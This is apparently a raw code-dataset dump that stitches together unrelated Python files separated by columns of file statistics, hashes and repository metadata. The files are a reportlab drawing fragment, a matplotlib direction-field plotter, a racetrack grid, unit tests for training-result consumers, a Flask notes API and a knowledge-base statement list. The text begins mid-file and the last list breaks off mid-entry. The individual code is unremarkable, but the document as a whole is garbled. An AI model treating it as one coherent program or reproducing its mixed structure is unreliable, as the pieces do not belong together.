v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
if __name__=="__main__": #NORUNTESTS
ExplodedDrawing_Drawing().save(formats=['pdf'],outDir='.',fnRoot=None)
| 156.004673
| 251
| 0.794608
| 5,404
| 33,385
| 4.900814
| 0.023871
| 0.015859
| 0.146957
| 0.188944
| 0.972512
| 0.96647
| 0.964809
| 0.960958
| 0.960693
| 0.959409
| 0
| 0.139802
| 0.020848
| 33,385
| 213
| 252
| 156.737089
| 0.670378
| 0.001677
| 0
| 0.688995
| 1
| 0
| 0.007501
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004785
| false
| 0
| 0.009569
| 0
| 0.019139
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f0de349a7ae206b0cb5e6d2f6320be9dbb0f42b6
| 2,946
|
py
|
Python
|
draw_test.py
|
maker-tj/WA-SUPER-BPD
|
afe8977cb3fb3ba3db2d7f3361e286dd4221fa7d
|
[
"Apache-2.0"
] | null | null | null |
draw_test.py
|
maker-tj/WA-SUPER-BPD
|
afe8977cb3fb3ba3db2d7f3361e286dd4221fa7d
|
[
"Apache-2.0"
] | null | null | null |
draw_test.py
|
maker-tj/WA-SUPER-BPD
|
afe8977cb3fb3ba3db2d7f3361e286dd4221fa7d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
from matplotlib.pyplot import MultipleLocator
def draw_direction(image, direction, b_heigh, b_width, M, N):
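    """Overlay the direction field on an image crop as quiver plots.

    Figure 1 draws the raw direction vectors and figure 2 the unit-normalised
    vectors over the M x N crop of `image` starting at (b_heigh, b_width).
    """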
heigh = M #image.shape[0]
width = N #image.shape[1]
plt.figure(1)
x0 = np.arange(0, width, 1)
x1 = np.arange(0, heigh, 1)
X, Y = np.meshgrid(x0, x1)
X = X.flatten()
Y = Y.flatten()
plt.xticks(x0)
plt.yticks(x1)
ax = plt.gca()
grad1 = direction[:, b_heigh:b_heigh+M, b_width:b_width+N]
grad = grad1.transpose(1, 2, 0)
grad = list(reversed(grad.tolist()))
grad = np.array(grad)
grad = grad.transpose(2, 0, 1)
grad_0 = grad[0].flatten()
grad_1 = grad[1].flatten()
plt.quiver(X, Y, grad_0, grad_1, angles="xy", color="#666666")
# Labels for major ticks
ax.set_xticklabels(np.arange(1, width+1, 1))
ax.set_yticklabels(np.arange(1, heigh+1, 1))
# Major ticks
ax.set_xticks(np.arange(0, width, 1))
ax.set_yticks(np.arange(0, heigh, 1))
# Minor ticks
ax.set_xticks(np.arange(-.5, width-0.5, 1), minor=True)
ax.set_yticks(np.arange(-.5, heigh-0.5, 1), minor=True)
image_crop = image[b_heigh:b_heigh+M,b_width:b_width+N,:]
plt.grid(linewidth=0.15, which='minor', axis='both')
c = list(reversed(image_crop.tolist()))
plt.imshow(c, origin='lower',aspect='equal', alpha = 1)
plt.draw()
plt.savefig('images/my_images/1.png')
plt.show()
###########################################
plt.figure(2)
x0 = np.arange(0, width, 1)
x1 = np.arange(0, heigh, 1)
X, Y = np.meshgrid(x0, x1)
X = X.flatten()
Y = Y.flatten()
plt.xticks(x0)
plt.yticks(x1)
ax = plt.gca()
grad1 = direction[:, b_heigh:b_heigh+M, b_width:b_width+N]
grad = grad1.transpose(1, 2, 0)
grad = list(reversed(grad.tolist()))
grad = np.array(grad)
grad = grad.transpose(2, 0, 1)
grad_0 = grad[0].flatten()
grad_1 = grad[1].flatten()
grad_norm = np.sqrt(grad_0 ** 2 + grad_1 ** 2) + 0.000001
aa = grad_0 / grad_norm
plt.quiver(X, Y, grad_0 / grad_norm, grad_1 / grad_norm, angles="xy", color="#666666")
# Labels for major ticks
ax.set_xticklabels(np.arange(1, width+1, 1))
ax.set_yticklabels(np.arange(1, heigh+1, 1))
# Major ticks
ax.set_xticks(np.arange(0, width, 1))
ax.set_yticks(np.arange(0, heigh, 1))
# Minor ticks
ax.set_xticks(np.arange(-.5, width-0.5, 1), minor=True)
ax.set_yticks(np.arange(-.5, heigh-0.5, 1), minor=True)
image_crop = image[b_heigh:b_heigh+M, b_width:b_width+N, :]
plt.grid(linewidth=0.15, which='minor', axis='both')
c = list(reversed(image_crop.tolist()))
plt.imshow(c, origin='lower',aspect='equal', alpha = 1)
plt.draw()
plt.savefig('images/my_images/2.png')
plt.show()
| 30.061224
| 91
| 0.593007
| 471
| 2,946
| 3.598726
| 0.171975
| 0.075516
| 0.042478
| 0.033038
| 0.821239
| 0.821239
| 0.821239
| 0.79764
| 0.79764
| 0.79764
| 0
| 0.053603
| 0.227427
| 2,946
| 97
| 92
| 30.371134
| 0.691125
| 0.041412
| 0
| 0.771429
| 0
| 0
| 0.039252
| 0.016449
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014286
| false
| 0
| 0.057143
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b1d4ae8ded7ebac3827f6b73f713a5dd46f0786
| 1,960
|
py
|
Python
|
chap7/MP-HW7/racetracks.py
|
tzhangZJU/Motion-Planning-Course
|
d8a94700394dbf48200b0b2291672bd5ec670eaa
|
[
"MIT"
] | 119
|
2019-10-14T01:54:08.000Z
|
2022-03-22T06:03:50.000Z
|
chap7/MP-HW7/racetracks.py
|
sdurmustalipoglu/Motion-Planning-Course
|
f8e8034496a1f300f97486d06aa567d813ddeb27
|
[
"MIT"
] | 1
|
2019-10-23T04:41:54.000Z
|
2020-01-24T03:46:47.000Z
|
chap7/MP-HW7/racetracks.py
|
Forrest-Z/Motion-Planning-Course
|
d2ff6c96bbe3944c21a08af65e82fc44e882d506
|
[
"MIT"
] | 68
|
2019-10-22T12:08:23.000Z
|
2022-03-31T07:39:27.000Z
|
# Problem definition
import numpy as np
START_LINE = [[0, 3], [0, 4], [0, 5], [0, 6]]
FINISH_LINE = [[34, 11], [33, 11], [32, 11]]
# FINISH_LINE = [ [32, 11]]
# acc: acceleration actions, each a 2-component velocity increment with components in {-1, 0, 1}
ACTION_SPACE = [[1, 1], [0, 1], [1, 0], [0, 0], [-1, 0], [0, -1], [1, -1], [-1, 1], [-1, -1]]
# ACTION_SPACE = [[0, 1], [1, 0], [0, 0], [-1, 0], [0, -1]]
action_assert_list = [-1, 0, 1]
# action_assert_list = [-1, 0,1,2,3]
FINISH = 3
START = 2
FREE = 0
OCCUPIED = 1
OUTBOUND = -1
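# Grid encoding for race_track below: 0 = free cell, 1 = occupied (off-track),
# 2 = start line, 3 = finish line; see FREE/OCCUPIED/START/FINISH above.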
race_track = np.array([
[1, 1, 1, 2, 2, 2, 2, 1, 1, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3]
], dtype=np.int32)
| 35
| 93
| 0.342857
| 512
| 1,960
| 1.292969
| 0.064453
| 0.607251
| 0.738671
| 0.767372
| 0.720544
| 0.720544
| 0.720544
| 0.720544
| 0.663142
| 0.654079
| 0
| 0.374327
| 0.336224
| 1,960
| 55
| 94
| 35.636364
| 0.134512
| 0.071939
| 0
| 0.702128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021277
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.021277
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
9bcf29c66549fdf0b9bfb767c53f2ae45dac72d3
| 6,804
|
py
|
Python
|
tests/train/test_consumers.py
|
crim-ca/thelper
|
1415144cf70e4492c2ef00f834e2b9a988064a76
|
[
"Apache-2.0"
] | null | null | null |
tests/train/test_consumers.py
|
crim-ca/thelper
|
1415144cf70e4492c2ef00f834e2b9a988064a76
|
[
"Apache-2.0"
] | null | null | null |
tests/train/test_consumers.py
|
crim-ca/thelper
|
1415144cf70e4492c2ef00f834e2b9a988064a76
|
[
"Apache-2.0"
] | 1
|
2020-02-17T14:14:46.000Z
|
2020-02-17T14:14:46.000Z
|
import numpy as np
import torch
import thelper
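# Tests for thelper's training output consumers: ClassifLogger, ClassifReport
# and ConfusionMatrix are each fed random predictions and must produce
# consistent reports with and without explicit class names.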
def test_classif_logger():
    # classification results are expected in 1D format; let's build some dummy data...
batch_size = 16
iter_count = 32
input_shape = (3, 32, 32)
class_count = 10
class_names = [str(i) for i in range(class_count)]
task = thelper.tasks.Classification(class_names, "input", "gt", ["idx"])
consumer_config = {"consumer": {
"type": "thelper.train.utils.ClassifLogger",
"params": {"top_k": 3, "report_count": 10,
"class_names": class_names, "log_keys": ["idx"]}
}}
consumers = thelper.train.create_consumers(consumer_config)
consumer = consumers["consumer"]
assert isinstance(consumer, thelper.train.utils.ClassifLogger)
assert consumer.top_k == 3
assert consumer.report_count == 10
assert consumer.class_names == class_names
assert consumer.report() is None
assert repr(consumer)
inputs, targets, preds = [], [], []
tot_idx = 0
for iter_idx in range(iter_count):
# set batch size to one for 'lingering' sample in last minibatch
curr_batch_size = batch_size if iter_idx < iter_count - 1 else 1
inputs.append(torch.randn((curr_batch_size, *input_shape)))
targets.append(torch.randint(low=0, high=class_count, size=(curr_batch_size, )))
preds.append(torch.rand((curr_batch_size, class_count)))
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(curr_batch_size)]},
None, iter_idx, iter_count, 0, 1)
tot_idx += curr_batch_size
report = consumer.report()
assert report is not None and isinstance(report, str)
assert len(report.split("\n")) == 11 # 10 lines + header
assert "target_name,target_score,pred_1_name,pred_1_score,pred_2_name," \
"pred_2_score,pred_3_name,pred_3_score,idx" == report.split("\n")[0]
consumer.reset()
assert consumer.report() is None
consumer.class_names = None
tot_idx = 0
for iter_idx in range(iter_count):
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(targets[iter_idx].shape[0])]},
None, iter_idx, iter_count, 0, 1)
tot_idx += targets[iter_idx].shape[0]
assert consumer.report() == report
def test_classif_report():
    # classification results are expected in 1D format; let's build some dummy data...
batch_size = 16
iter_count = 32
input_shape = (3, 32, 32)
class_count = 10
class_names = [str(i) for i in range(class_count)]
task = thelper.tasks.Classification(class_names, "input", "gt", ["idx"])
consumer_config = {"consumer": {
"type": "thelper.train.utils.ClassifReport",
"params": {"class_names": class_names}
}}
consumers = thelper.train.create_consumers(consumer_config)
consumer = consumers["consumer"]
assert isinstance(consumer, thelper.train.utils.ClassifReport)
assert consumer.class_names == class_names
assert consumer.report() is None
assert repr(consumer)
inputs, targets, preds = [], [], []
tot_idx = 0
for iter_idx in range(iter_count):
# set batch size to one for 'lingering' sample in last minibatch
curr_batch_size = batch_size if iter_idx < iter_count - 1 else 1
inputs.append(torch.randn((curr_batch_size, *input_shape)))
targets.append(torch.randint(low=0, high=class_count, size=(curr_batch_size, )))
preds.append(torch.rand((curr_batch_size, class_count)))
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(curr_batch_size)]},
None, iter_idx, iter_count, 0, 1)
tot_idx += curr_batch_size
report = consumer.report()
assert report is not None and isinstance(report, str)
assert report.endswith(f"{tot_idx}\n") # should be total number of samples in last cell
consumer.reset()
assert consumer.report() is None
consumer.class_names = None
tot_idx = 0
for iter_idx in range(iter_count):
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(targets[iter_idx].shape[0])]},
None, iter_idx, iter_count, 0, 1)
tot_idx += targets[iter_idx].shape[0]
assert consumer.report() == report
def test_confmat():
    # classification results are expected in 1D format; let's build some dummy data...
batch_size = 16
iter_count = 32
input_shape = (3, 32, 32)
class_count = 10
class_names = [str(i) for i in range(class_count)]
task = thelper.tasks.Classification(class_names, "input", "gt", ["idx"])
consumer_config = {"consumer": {
"type": "thelper.train.utils.ConfusionMatrix",
"params": {"class_names": class_names}
}}
consumers = thelper.train.create_consumers(consumer_config)
consumer = consumers["consumer"]
assert isinstance(consumer, thelper.train.utils.ConfusionMatrix)
assert consumer.class_names == class_names
assert consumer.report() is None
assert repr(consumer)
inputs, targets, preds = [], [], []
tot_idx = 0
for iter_idx in range(iter_count):
# set batch size to one for 'lingering' sample in last minibatch
curr_batch_size = batch_size if iter_idx < iter_count - 1 else 1
inputs.append(torch.randn((curr_batch_size, *input_shape)))
targets.append(torch.randint(low=0, high=class_count, size=(curr_batch_size, )))
preds.append(torch.rand((curr_batch_size, class_count)))
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(curr_batch_size)]},
None, iter_idx, iter_count, 0, 1)
tot_idx += curr_batch_size
report = consumer.report()
assert report is not None and isinstance(report, str)
assert report.endswith(f"{tot_idx}\n") # should be total number of samples in last cell
render = consumer.render()
assert render is None or isinstance(render, np.ndarray)
consumer.reset()
assert consumer.report() is None
consumer.class_names = None
tot_idx = 0
for iter_idx in range(iter_count):
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(targets[iter_idx].shape[0])]},
None, iter_idx, iter_count, 0, 1)
tot_idx += targets[iter_idx].shape[0]
assert consumer.report() == report
| 46.285714
| 94
| 0.653733
| 923
| 6,804
| 4.612134
| 0.122427
| 0.06413
| 0.054968
| 0.033827
| 0.892882
| 0.892882
| 0.892882
| 0.892882
| 0.892882
| 0.892882
| 0
| 0.016415
| 0.230012
| 6,804
| 146
| 95
| 46.60274
| 0.796144
| 0.079365
| 0
| 0.842105
| 0
| 0
| 0.066677
| 0.032619
| 0
| 0
| 0
| 0
| 0.210526
| 1
| 0.022556
| false
| 0
| 0.022556
| 0
| 0.045113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9bd7384cb7cb028da04a1facc3162b646c9ad07c
| 12,233
|
py
|
Python
|
api/notes.py
|
ThinkmanWang/NotesServer
|
86a1f7f56b30f94aaccd3d70941e3873cc1713e2
|
[
"Apache-2.0"
] | null | null | null |
api/notes.py
|
ThinkmanWang/NotesServer
|
86a1f7f56b30f94aaccd3d70941e3873cc1713e2
|
[
"Apache-2.0"
] | 1
|
2021-06-01T21:40:51.000Z
|
2021-06-01T21:40:51.000Z
|
api/notes.py
|
ThinkmanWang/NotesServer
|
86a1f7f56b30f94aaccd3d70941e3873cc1713e2
|
[
"Apache-2.0"
] | null | null | null |
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'models'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'utils'))
from importlib import reload
import MySQLdb
import json
import hashlib
import time
import uuid
from flask import Flask, render_template, request, redirect, url_for, send_from_directory
from werkzeug.utils import secure_filename
from utils.mysql_python import MysqlPython
from utils.object2json import obj2json
from models.RetModel import RetModel
from utils.user_db_utils import *
from utils.note_db_utils import *
from error_code import *
from flask import Blueprint
notes_api = Blueprint('notes_api', __name__)
# For notes
@notes_api.route("/api/get_notes_list", methods=['POST', 'GET'])
def get_notes_list():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('limit', None) is None or request.form.get('offset', None) is None):
return obj2json(RetModel(46, dict_err_code[46], {}) )
if (False == request.form['limit'].isdigit() or False == request.form['offset'].isdigit()):
return obj2json(RetModel(46, dict_err_code[46], {}) )
if (request.form.get('member_uid', None) is not None):
lstNoteId = select_note_list(request.form['member_uid'], int(request.form['limit']), int(request.form['offset']), request.form.get('type', '0'))
szRet = obj2json(RetModel(0, dict_err_code[0], lstNoteId) )
return szRet
else:
lstNoteId = select_note_list(request.form['uid'], int(request.form['limit']), int(request.form['offset']), request.form.get('type', '0'))
szRet = obj2json(RetModel(0, dict_err_code[0], lstNoteId) )
return szRet
@notes_api.route("/api/get_note", methods=['POST', 'GET'])
def get_note():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41], {}) )
note = select_note(request.form['uid'], request.form['id'])
szRet = ""
if (note is None):
szRet = obj2json(RetModel(40, dict_err_code[40], {}) )
else:
szRet = obj2json(RetModel(0, dict_err_code[0], note) )
return szRet
@notes_api.route("/api/add_note", methods=['POST', 'GET'])
def add_note():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41], {}) )
if (request.form.get('date', None) is None):
return obj2json(RetModel(42, dict_err_code[42], {}) )
if (request.form.get('customer_id', None) is None):
return obj2json(RetModel(31, dict_err_code[31], {}) )
if (request.form.get('address', None) is None):
return obj2json(RetModel(43, dict_err_code[43], {}) )
if (request.form.get('longitude', None) is None):
return obj2json(RetModel(44, dict_err_code[44], {}) )
if (request.form.get('latitude', None) is None):
return obj2json(RetModel(45, dict_err_code[45], {}) )
if (request.form.get('note', None) is None):
return obj2json(RetModel(40, dict_err_code[40], {}) )
note = {}
note["id"] = request.form['id']
note["uid"] = request.form['uid']
note["date"] = request.form['date']
note["update_date"] = request.form.get('update_date', int(time.time()))
note["customer_id"] = request.form['customer_id']
note["address"] = request.form['address']
note["longitude"] = request.form['longitude']
note["latitude"] = request.form['latitude']
note["note"] = request.form['note']
note["thumbnail"] = request.form.get('thumbnail', '')
note["pic"] = request.form.get('pic', '')
if (True == insert_note(request.form['uid'], note)):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
@notes_api.route("/api/update_note", methods=['POST', 'GET'])
def update_note():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41], {}) )
if (request.form.get('date', None) is None):
return obj2json(RetModel(42, dict_err_code[42], {}) )
if (request.form.get('customer_id', None) is None):
return obj2json(RetModel(31, dict_err_code[31], {}) )
if (request.form.get('address', None) is None):
return obj2json(RetModel(43, dict_err_code[43], {}) )
if (request.form.get('longitude', None) is None):
return obj2json(RetModel(44, dict_err_code[44], {}) )
if (request.form.get('latitude', None) is None):
return obj2json(RetModel(45, dict_err_code[45], {}) )
if (request.form.get('note', None) is None):
return obj2json(RetModel(40, dict_err_code[40], {}) )
note = {}
note["id"] = request.form['id']
note["uid"] = request.form['uid']
note["date"] = request.form['date']
note["update_date"] = request.form.get('update_date', int(time.time()))
note["customer_id"] = request.form['customer_id']
note["address"] = request.form['address']
note["longitude"] = request.form['longitude']
note["latitude"] = request.form['latitude']
note["note"] = request.form['note']
note["thumbnail"] = request.form.get('thumbnail', '')
note["pic"] = request.form.get('pic', '')
szRet = ''
if (False == if_note_exists(note)):
szRet = obj2json(RetModel(40, dict_err_code[40], {}) )
else:
if (True == update_note_info(request.form['uid'], note)):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
@notes_api.route("/api/delete_note", methods=['POST', 'GET'])
def delete_note():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41]))
if (remove_note(request.form['uid'], request.form['id'])):
return obj2json(RetModel(0, dict_err_code[0], {}) )
else:
return obj2json(RetModel(1000, dict_err_code[1000], {}) )
# get all posts from my team, my own, and posts public to me
@notes_api.route("/api/get_posts", methods=['POST', 'GET'])
def get_posts():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('limit', None) is None or request.form.get('offset', None) is None):
return obj2json(RetModel(46, dict_err_code[46], {}) )
if (False == request.form['limit'].isdigit() or False == request.form['offset'].isdigit()):
return obj2json(RetModel(46, dict_err_code[46], {}) )
if (request.form.get('member_uid', None) is not None):
lstNotes = select_note_for_member(request.form['member_uid'], request.form['limit'], request.form['offset'])
szRet = obj2json(RetModel(0, dict_err_code[0], lstNotes) )
return szRet
else:
lstNotes = db_query_posts_public_to_me(request.form['uid'], request.form['limit'], request.form['offset'])
szRet = obj2json(RetModel(0, dict_err_code[0], lstNotes) )
return szRet
# repost a note
@notes_api.route("/api/repost", methods=['POST', 'GET'])
def repost():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41], {}) )
if (request.form.get('address', None) is None):
return obj2json(RetModel(43, dict_err_code[43], {}) )
if (request.form.get('longitude', None) is None):
return obj2json(RetModel(44, dict_err_code[44], {}) )
if (request.form.get('latitude', None) is None):
return obj2json(RetModel(45, dict_err_code[45], {}) )
if (request.form.get('customer_id', None) is None):
return obj2json(RetModel(31, dict_err_code[31], {}) )
if (request.form.get('note', None) is None):
return obj2json(RetModel(40, dict_err_code[40], {}) )
if (request.form.get('repost_from', None) is None):
return obj2json(RetModel(47, dict_err_code[47], {}) )
note = {}
note["id"] = request.form['id']
note["uid"] = request.form['uid']
note["date"] = request.form.get('date', int(time.time()))
note["update_date"] = request.form.get('update_date', int(time.time()))
note["customer_id"] = request.form['customer_id']
note["address"] = request.form['address']
note["longitude"] = request.form['longitude']
note["latitude"] = request.form['latitude']
note["note"] = request.form['note']
note["thumbnail"] = request.form.get('thumbnail', '')
note["pic"] = request.form.get('pic', '')
note["repost_from"] = request.form.get('repost_from', '0')
if (True == db_repost_note(request.form['uid'], note)):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
| 40.506623
| 153
| 0.599281
| 1,578
| 12,233
| 4.49493
| 0.072877
| 0.179896
| 0.097702
| 0.076695
| 0.878754
| 0.842521
| 0.823911
| 0.810235
| 0.80079
| 0.78373
| 0
| 0.03233
| 0.231341
| 12,233
| 301
| 154
| 40.641196
| 0.722004
| 0.006294
| 0
| 0.75
| 0
| 0
| 0.091216
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032407
| false
| 0
| 0.083333
| 0
| 0.384259
| 0.009259
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50031227e7112f6292fd3902da07c0768be0bc3e
| 25,966
|
py
|
Python
|
pepper/brain/utils/base_cases.py
|
neelrast/pepper-depression-module
|
d36ab123d9ce32d1647b6473b10a5f1ee30a251d
|
[
"MIT"
] | null | null | null |
pepper/brain/utils/base_cases.py
|
neelrast/pepper-depression-module
|
d36ab123d9ce32d1647b6473b10a5f1ee30a251d
|
[
"MIT"
] | null | null | null |
pepper/brain/utils/base_cases.py
|
neelrast/pepper-depression-module
|
d36ab123d9ce32d1647b6473b10a5f1ee30a251d
|
[
"MIT"
] | null | null | null |
from datetime import date
statements = [
{ # lenka is from Serbia
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "serbia",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 1,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram is from the netherlands
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "netherlands",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 2,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene is from mexico
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "mexico",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 3,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek is from the netherlands
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "netherlands",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 4,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene K is from the netherlands
"subject": {
"label": "selene_k",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "netherlands",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 5,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram likes goulash
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "goulash",
"type": "dish"
},
"author": "selene",
